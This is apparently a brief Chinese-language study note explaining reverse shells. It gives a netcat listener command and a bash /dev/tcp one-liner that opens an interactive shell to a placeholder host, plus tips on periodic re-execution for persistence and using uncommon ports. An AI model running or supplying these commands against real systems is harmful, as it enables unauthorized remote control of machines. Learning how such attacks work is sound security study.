反弹shell
学习笔记
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发器请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
持久化控制,通过每隔一段时间执行反弹shell即可获取持久化控制。
端口使用不固定。(尽量找一些不常用的端口。)
nc -lnvp 12345 #服务端开启监听12345端口
bash -i >& /dev/tcp/x.x.x.x/12345 0>&1 #客户端向x.x.x.x建立交互连接
-i: 产生交互式的shell
/dev/tcp/: linux中一切皆文件
>&: 混合输出
服务器:
客户端:
服务端: